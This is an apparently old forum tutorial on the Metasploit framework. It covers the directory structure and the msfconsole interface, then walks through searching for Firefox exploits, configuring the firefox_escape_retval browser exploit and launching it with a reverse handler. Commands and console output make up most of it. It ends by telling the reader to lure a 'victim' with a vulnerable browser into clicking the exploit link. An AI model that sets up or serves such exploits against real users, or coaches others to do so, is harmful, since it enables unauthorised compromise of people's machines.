Metasploit is a Hacking Framework consisting of tools , exploits , Knowledge etc etc...Its a Boon to pen-testers , exploit developers and Hackers ... This Project was started by H.D Moore and is now open source project managed by Rapid7 For Downloading and installing instructions Click here I will use my Ubuntu 10.10 OS for code samples. So , some commands maybe different on other OS versions and if you have queries and questions please don't hesitate to post in comments below. The directory structure Metasplot have a very self-explanatory and a user-friendly directory structure.. The metasploit directory is located at /opt/metasploit3 in Linux Code: aneesh@aneesh-laptop:~$ cd /opt/metasploit3/ aneesh@aneesh-laptop:/opt/metasploit3$ Lets see the different directories :- Code: aneesh@aneesh-laptop:/opt/metasploit3$ ls app bin env.sh lib msf3 run.sh aneesh@aneesh-laptop:/opt/metasploit3$ cd msf3/ aneesh@aneesh-laptop:/opt/metasploit3/msf3$ ls armitage HACKING msfconsole msfgui msfpescan plugins tools data lib msfd msfmachscan msfrpc README documentation modules msfelfscan msfopcode msfrpcd scripts external msfcli msfencode msfpayload msfupdate test aneesh@aneesh-laptop:/opt/metasploit3/msf3$ The Data directory : contains the basic data for exploits like php sources , wordlists etc etc... Code: aneesh@aneesh-laptop:/opt/metasploit3/msf3$ cd data/ aneesh@aneesh-laptop:/opt/metasploit3/msf3/data$ ls armitage isight.bundle passivex vncdll.dll eicar.com java php vncdll.x64.dll eicar.txt lab post wmap emailer_config.yaml meterpreter snmp wordlists exploits msfcrawler sounds gui msflinker_linux_x86.bin sql ipwn msfpescan templates The lib directory : The name is pretty self-explanatory , its the file that contains all the libraries necessary to work metasploit The main directory that is of great use to us is the modules directory Code: aneesh@aneesh-laptop:/opt/metasploit3/msf3$ cd modules aneesh@aneesh-laptop:/opt/metasploit3/msf3/modules$ ls auxiliary encoders exploits modules.rb.ts.rb nops payloads post aneesh@aneesh-laptop:/opt/metasploit3/msf3/modules$ The exploit dir : contains the exploits for various architectures The encoders dir : Contains varoius encoders for encoding pages , programs etc etc... The auxiliary dir : Contains a list of tools used for pen-testing like DOS , sniffers , etc etc.. The payloads, nops dir : Provides the shellcodes used for exploitations...(Code execution) Getting to know Metasploit The main part of metasploit is its interface types. The four main types of interfaces are :- msfweb (The Web Interface) msfgui (The graphical user interface) msfconsole (The console interface) msfcli (The command line interface) The most powerful and the most used interface is the Console interface so , We'll be looking at that throughout this tutorial... To open metasploit just type 'msfconsole' in your shell and you should get an output similar to this :- Code: aneesh@aneesh-laptop:~$ msfconsole _ | | o _ _ _ _ _|_ __, , _ | | __ _|_ / |/ |/ | |/ | / | / \_|/ \_|/ / \_| | | | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/ /| \| =[ metasploit v3.6.0-dev [core:3.6 api:1.0] + -- --=[ 643 exploits - 328 auxiliary + -- --=[ 216 payloads - 27 encoders - 8 nops =[ svn r11647 updated today (2011.01.26) msf > Now that we know how to open metasploit lets see some of its modules... We use several commands for it :- The show all command syntax - show all The search command syntax - search (pattern) For eg :- Lets search for firefox exploits and see whats there in stores for us Code: msf > search firefox [*] Searching loaded modules for pattern 'firefox'... Exploits ======== Name Disclosure Date Rank Description ---- --------------- ---- ----------- multi/browser/firefox_escape_retval 2006-07-14 normal Firefox 3.5 escape() Return Value Memory Corruption multi/browser/firefox_queryinterface 2006-02-02 normal Firefox location.QueryInterface() Code Execution multi/browser/mozilla_compareto 2005-07-13 normal Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution multi/browser/mozilla_navigatorjava 2006-07-25 normal Mozilla Suite/Firefox Navigator Object Code Execution windows/browser/apple_quicktime_rtsp 2007-01-01 normal Apple QuickTime 7.1.3 RTSP URI Buffer Overflow windows/browser/awingsoft_winds3d_sceneurl 2009-11-14 excellent AwingSoft Winds3D Player 3.5 SceneURL Download and Execute windows/browser/dxstudio_player_exec 2009-06-09 excellent Worldweaver DX Studio Player <= 3.0.29 shell.execute() Command Execution windows/browser/ms07_017_ani_loadimage_chunksize 2007-03-28 great Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) msf > You will notice that there are many of exploits on browser vulnerabilities..and maybe some are useful for us... This is the power of metasploit!! lets use the 'use' command to select a exploit Syntax :- Code: use (path) Output :- Code: msf > use exploit/multi/browser/firefox_escape_retval msf exploit(firefox_escape_retval) > Now lets see the options. Code: show options Output :- Code: msf exploit(firefox_escape_retval) > show options Module options (exploit/multi/browser/firefox_escape_retval): Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH no The URI to use for this exploit (default is random) Exploit target: Id Name -- ---- 0 Firefox 3.5.0 on Windows XP SP0-SP3 Let us now set the options This can be done by using :- Code: set (option name) (value) Now lets set some options according to our needs Code: msf exploit(firefox_escape_retval) > set SRVHOST localhost SRVHOST => localhost msf exploit(firefox_escape_retval) > set SRVPORT 80 SRVPORT => 80 msf exploit(firefox_escape_retval) > set URIPATH /exploit URIPATH => /exploit Explanations :- The 'set SRVHOST localhost' means set the host to localhost this is the server on which our exploit is hosted.. The 'set SRVPORT 80' means this is the Post no on which the server will be hosted … As we know Post 80 is default for web-servers we use this The 'set URIPATH /exploit' means the URLPATH of the exploit... This means that we have to bring the victim to click on the page of url http://localhost/exploit So as to make the exploit work!! Now as the options are set lets run the exploit... This can be done by :- Code: exploit Output :- Code: msf exploit(firefox_escape_retval) > exploit [*] Exploit running as background job. [*] Started reverse handler on 10.10.2.35:4444 [*] Using URL: http://localhost:80/exploit [*] Server started. So the output states that we have successfully started the exploit!! Now the work gets a lot more easier... We just have to make a user with this Browser vulnerability click this link.. I hope it is enough to get you started working with metasploit...
Thanks Shabbir... For accepting my articles and making it much better with the edits... Thanks a ton!!!
